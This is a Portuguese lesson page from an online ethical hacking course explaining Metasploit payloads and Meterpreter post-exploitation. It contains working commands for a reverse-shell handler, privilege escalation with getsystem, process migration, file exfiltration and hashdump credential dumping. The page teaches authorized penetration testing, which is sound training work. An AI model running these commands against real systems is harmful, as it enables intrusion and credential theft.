Ethical Hacking Academy · Aula

Cargas úteis e Meterpreter

Shell pós-exploração

Aula 3 de 413 etapas

Cargas úteis e Meterpreter é uma aula grátis de Ethical Hacking Academy no CoddyKit. Esta é a aula 3 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Ethical Hacking Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Ethical Hacking Academy inclui 4 aulas no total.

O que é uma carga útil

Uma carga útil é o código executado no alvo depois que uma exploração tem sucesso. Ela define o que você poderá fazer em seguida, desde executar um único comando até abrir um shell interativo completo.

A escolha da carga útil correta depende do OS do alvo, da configuração da rede e do nível de acesso necessário.

Com estágios versus sem estágios

As cargas úteis usam dois estilos de entrega:

  • Com estágios (observe o / em meterpreter/reverse_tcp): envia primeiro um pequeno componente, que depois baixa a carga útil completa. A presença inicial é menor.
  • Sem estágios (observe o _ em meterpreter_reverse_tcp): a carga útil inteira é entregue de uma vez. É mais confiável em redes instáveis.

Shells de ligação versus reversos

Há duas direções de conexão:

  • Shell de ligação: o alvo abre uma porta e aguarda; você se conecta a ele. Frequentemente é bloqueado por firewalls.
  • Shell reverso: o alvo se conecta de volta a você (LHOST/LPORT). Normalmente passa por firewalls que permitem conexões de saída.

Por esse motivo, as cargas úteis reversas são o padrão mais comum.

Conhecendo o Meterpreter

O Meterpreter é a carga útil avançada do Metasploit. Diferentemente de um shell de comandos básico, ele é executado na memória, comunica-se por um canal criptografado e oferece um conjunto amplo de comandos para pós-exploração.

Como evita gravar no disco, ele é mais discreto do que a criação de um executável separado.

Comandos essenciais do Meterpreter

Depois que você obtiver uma sessão do Meterpreter, os comandos fundamentais ajudarão a orientar você no alvo.

sysinfo      # OS, architecture, hostname
getuid       # current user context
ps           # running processes
pwd  ls  cd  # filesystem navigation

Transferência de arquivos

O Meterpreter move arquivos entre sua máquina e o alvo com comandos simples, úteis para coletar evidências ou preparar ferramentas em testes autorizados.

download C:\\Users\\admin\\secret.txt /tmp/
upload /tmp/tool.exe C:\\Windows\\Temp\\

Acessando um shell do sistema

O comando shell leva você do Meterpreter ao interpretador de comandos nativo do alvo (cmd.exe ou /bin/sh) quando você precisa executar diretamente comandos do OS.

Digite exit para retornar ao prompt do Meterpreter sem perder a sessão.

shell
# C:\> whoami
# exit  -> back to meterpreter

Escalonamento de privilégios

É comum você obter acesso inicialmente com privilégios limitados. O Meterpreter ajuda a escalá-los:

  • getsystem tenta técnicas conhecidas para obter SYSTEM no Windows.
  • O módulo pós-exploração local_exploit_suggester recomenda explorações locais de escalonamento de privilégios para o host.

Privilégios mais altos liberam a extração de credenciais e um acesso mais profundo.

getsystem
run post/multi/recon/local_exploit_suggester

Migrando processos

Sua sessão vive dentro de um processo. Se esse processo for instável ou provavelmente encerrado, use migrate para passar a um processo mais estável e duradouro, mantendo sua sessão ativa.

Migrar para um processo que corresponda ao seu nível de privilégio também ajuda a se misturar ao ambiente e pode alterar o contexto do usuário.

ps
migrate 1340     # migrate into a stable PID

Mantendo o acesso

O Meterpreter inclui recursos para capturar dados úteis durante avaliações autorizadas, como hashdump para coletar hashes de senhas e ferramentas de captura de teclas para demonstrar o impacto da captura de entrada.

Use esses recursos somente dentro do escopo acordado e documente tudo no relatório do cliente.

hashdump
run post/windows/gather/checkvm

Manipuladores

Uma carga útil reversa precisa de algo escutando do seu lado para capturar a conexão. O módulo multi/handler desempenha esse papel. Configure-o com a mesma carga útil, LHOST e LPORT usados para gerar a carga útil.

Isso é essencial quando você entrega uma carga útil do msfvenom fora do console: inicie primeiro o manipulador e depois acione a carga útil no alvo.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 4444
exploit -j

Verificação rápida

Escolha a carga útil que contorna um firewall restritivo.

Recapitulação

Você aprendeu sobre cargas úteis e o Meterpreter:

  • As cargas úteis podem ter estágios (/) ou não ter estágios (_), além de serem de ligação ou reversas; as reversas geralmente superam os firewalls.
  • O Meterpreter é executado na memória por um canal criptografado e oferece comandos abrangentes.
  • Tarefas essenciais: sysinfo, getuid, ps, download/upload, shell.
  • Escale privilégios com getsystem e local_exploit_suggester; use migrate para obter estabilidade.
  • Use recursos de coleta somente dentro do escopo e documente tudo.

A seguir: módulos pós-exploração, pivotamento e coleta de dados.

Grátis para começar

Aprenda Ethical Hacking Academy com um tutor de IA — grátis

Escreva e execute código real no seu navegador, obtenha ajuda instantânea de um tutor de IA 24/7 e continue de onde parou na web ou no app.

Cursos
31
Aulas
111

Perguntas Frequentes

A aula “Cargas úteis e Meterpreter” é grátis?

Sim — o texto completo de “Cargas úteis e Meterpreter” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Ethical Hacking Academy, atualize para CoddyKit PRO. O curso de Ethical Hacking Academy inclui 4 aulas no total.

O que vou aprender em “Cargas úteis e Meterpreter”?

Shell pós-exploração Você pratica Ethical Hacking Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.

Preciso ter experiência prévia para começar Ethical Hacking Academy?

Nenhuma experiência prévia é necessária. Ethical Hacking Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 3 de 4.

Quanto tempo leva a aula “Cargas úteis e Meterpreter”?

A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.

Posso escrever e executar código nesta aula de Ethical Hacking Academy?

Sim. Cada aula de Ethical Hacking Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.

Todas as aulas deste curso

  1. Arquitetura do Metasploit
  2. Pesquisa e uso de exploits
  3. Cargas úteis e Meterpreter
  4. Módulos pós-exploração
← Voltar para Ethical Hacking Academy